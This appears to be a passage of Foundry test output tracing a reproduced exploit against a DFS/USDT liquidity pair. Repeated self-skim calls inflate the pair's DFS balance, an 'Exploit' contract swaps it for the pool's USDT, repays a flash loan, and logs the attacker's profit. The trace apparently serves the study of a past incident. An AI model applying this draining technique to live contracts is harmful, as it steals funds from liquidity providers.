    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x00000000000000000000000000000000000000000000015c1f1590ed61b473dc → 0x0000000000000000000000000000000000000000000002ad76d4d302f961811c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 12644582391292308324636 [1.264e22]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 12445751195804953614976 [1.244e22])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 12445751195804953614976 [1.244e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000002ad76d4d302f961811c → 0x0000000000000000000000000000000000000000000005502653572e28bb9b9c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000002ad76d4d302f961811c → 0x0000000000000000000000000000000000000000000005502653572e28bb9b9c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 25090333587097261939612 [2.509e22]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 24891502391609907229952 [2.489e22])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 24891502391609907229952 [2.489e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000005502653572e28bb9b9c → 0x000000000000000000000000000000000000000000000a9585505f84876fd09c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000005502653572e28bb9b9c → 0x000000000000000000000000000000000000000000000a9585505f84876fd09c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 49981835978707169169564 [4.998e22]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 49783004783219814459904 [4.978e22])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 49783004783219814459904 [4.978e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000000a9585505f84876fd09c → 0x000000000000000000000000000000000000000000001520434a703144d83a9c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000000a9585505f84876fd09c → 0x000000000000000000000000000000000000000000001520434a703144d83a9c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 99764840761926983629468 [9.976e22]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 99566009566439628919808 [9.956e22])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 99566009566439628919808 [9.956e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000001520434a703144d83a9c → 0x000000000000000000000000000000000000000000002a35bf3e918abfa90e9c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000001520434a703144d83a9c → 0x000000000000000000000000000000000000000000002a35bf3e918abfa90e9c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 199330850328366612549276 [1.993e23]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 199132019132879257839616 [1.991e23])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 199132019132879257839616 [1.991e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000002a35bf3e918abfa90e9c → 0x000000000000000000000000000000000000000000005460b726d43db54ab69c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000002a35bf3e918abfa90e9c → 0x000000000000000000000000000000000000000000005460b726d43db54ab69c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15681] DFS_USDT_LP::skim(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 398462869461245870388892 [3.984e23]
    │   │   │   │   ├─ [4221] dfs::transfer(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 398264038265758515679232 [3.982e23])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 398264038265758515679232 [3.982e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x759a0d4d3edd1108537a593b654c78917502b7cb5e6648da2891162c8570ea14: 0x00000000000000000000000000000000000000000000000014ca94909c9a468b → 0x000000000000000000000000000000000000000000005456049b19f687dd968b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x759a0d4d3edd1108537a593b654c78917502b7cb5e6648da2891162c8570ea14: 0x00000000000000000000000000000000000000000000000014ca94909c9a468b → 0x000000000000000000000000000000000000000000005456049b19f687dd968b
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [649] dfs::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 398265536438933393348235 [3.982e23]
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  dfs balance : address(this)", val: 398265536438933393348235 [3.982e23], decimals: 18)
    │   │   │   ├─ [8184] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 378352259616986723680823 [3.783e23])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0xc4DE46a5C8fc7f57F07E232b465243A3Da3692f0, value: 1891761298084933618404 [1.891e21])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 378352259616986723680823 [3.783e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x871836ba62ccb526b85d0b12972d7d0dd5b176eb184e73fddfbb733cffcf83e6: 0x0000000000000000000000000000000000000000000000000c065bc2153fc644 → 0x000000000000000000000000000000000000000000000066997c9962ad931128
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000005460b726d43db54ab69c → 0x00000000000000000000000000000000000000000000a47f3b86f9b4b65d38d3
    │   │   │   │   │   @ 0x759a0d4d3edd1108537a593b654c78917502b7cb5e6648da2891162c8570ea14: 0x000000000000000000000000000000000000000000005456049b19f687dd968b → 0x0000000000000000000000000000000000000000000003d0f2c4b6deee77c970
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [649] dfs::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 18021515523861736049008 [1.802e22]
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  address(this) balance (dfs token)", val: 18021515523861736049008 [1.802e22], decimals: 18)
    │   │   │   ├─ [531] USDT::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  address(this) balance (usdt token)", val: 0, decimals: 18)
    │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  address(DFS_USDT_LP) balance (usdt token)", val: 2925094224615117842940 [2.925e21], decimals: 18)
    │   │   │   ├─ [38799] DFS_USDT_LP::swap(0, 2922169130390502725097 [2.922e21], Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0x00)
    │   │   │   │   ├─ [23171] USDT::transfer(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 2922169130390502725097 [2.922e21])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 2922169130390502725097 [2.922e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0 → 0x00000000000000000000000000000000000000000000009e693e3dc64a0b55e9
    │   │   │   │   │   │   @ 0x53e7603516a46b6143f8557df86f926e66d006cfb1f9ef594032cbdc42629189: 0x00000000000000000000000000000000000000000000009e91d643795ac669fc → 0x000000000000000000000000000000000000000000000000289805b310bb1413
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1454] Exploit::pancakeCall(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0, 2922169130390502725097 [2.922e21], 0x00)
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 776815129078232594069715 [7.768e23]
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117843 [2.925e18]
    │   │   │   │   ├─ emit Sync(reserve0: 776815129078232594069715 [7.768e23], reserve1: 2925094224615117843 [2.925e18])
    │   │   │   │   ├─ emit Swap(sender: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], amount0In: 776616297882745239360055 [7.766e23], amount1In: 0, amount0Out: 0, amount1Out: 2922169130390502725097 [2.922e21], to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x63aec4a900000000009e91d643795ac669fc00000000000ac7564ed7ca07669c → 0x63aec4a9000000000000289805b310bb141300000000a47f3b86f9b4b65d38d3
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] USDT::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 2922169130390502725097 [2.922e21]
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO] payback amount usdt ", val: 2922169130390502725097 [2.922e21], decimals: 18)
    │   │   │   ├─ [3271] USDT::transfer(USDT_CCDS_LP: [0x2B948B5D3EBe9F463B29280FC03eBcB82db1072F], 1469859847869096716077 [1.469e21])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: USDT_CCDS_LP: [0x2B948B5D3EBe9F463B29280FC03eBcB82db1072F], value: 1469859847869096716077 [1.469e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0x00000000000000000000000000000000000000000000009e693e3dc64a0b55e9 → 0x00000000000000000000000000000000000000000000004ebad70dc9f2d46ebc
    │   │   │   │   │   @ 0x2989ed4234a2d02f7925bbe492a9aca2700384267e62ff0e9fd7d37198cde8d9: 0x0000000000000000000000000000000000000000000a13dc66491cb1b4689963 → 0x0000000000000000000000000000000000000000000a142c14b04cae0b9f8090
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit log(val: "[INFO]  Flashloan payback success ")
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] USDT::balanceOf(USDT_CCDS_LP: [0x2B948B5D3EBe9F463B29280FC03eBcB82db1072F]) [staticcall]
    │   │   │   └─ ← [Return] 12184518673318714934263952 [1.218e25]
    │   │   ├─ [2952] ccds::balanceOf(USDT_CCDS_LP: [0x2B948B5D3EBe9F463B29280FC03eBcB82db1072F]) [staticcall]
    │   │   │   └─ ← [Return] 142106257693425836992696 [1.421e23]
    │   │   ├─ emit Sync(reserve0: 12184518673318714934263952 [1.218e25], reserve1: 142106257693425836992696 [1.421e23])
    │   │   ├─ emit Swap(sender: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], amount0In: 1469859847869096716077 [1.469e21], amount1In: 0, amount0Out: 1462547112307558921470 [1.462e21], amount1Out: 0, to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   │   ├─  storage changes:
    │   │   │   @ 10: 0x00000000000000000000000000001b959597605fb5a7a87fc7b9e82a2333a6a2 → 0x00000000000000000000000000001b95abb25d8f20964d0cd2fcc2f509d01792
    │   │   │   @ 8: 0x63aec467000000001e17987d8cf3001fa8b80000000a142baf343e6e61cbce61 → 0x63aec4a9000000001e17987d8cf3001fa8b80000000a142c14b04cae0b9f8090
    │   │   │   @ 9: 0x000000000000000000000000000002214f248529256214e518da7debd9c93b26 → 0x000000000000000000000000000002214f254a376747852114ec7877324a527e
    │   │   └─ ← [Stop]
    │   ├─ [531] USDT::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   └─ ← [Return] 1452309282521406009020 [1.452e21]
    │   ├─ emit log_named_decimal_uint(key: "[INFO]  usdt balance : this", val: 1452309282521406009020 [1.452e21], decimals: 18)
    │   ├─  storage changes:
    │   │   @ 32: 0 → 0x00000000000000000000000000000000000000000000004f48eb21bcad6334fe
    │   └─ ← [Stop]
    ├─ [531] USDT::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← [Return] 1452309282521406009020 [1.452e21]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT Balance", val: 1452309282521406009020 [1.452e21], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.17s (7.77s CPU time)

Ran 2 test suites in 10.26s (9.68s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
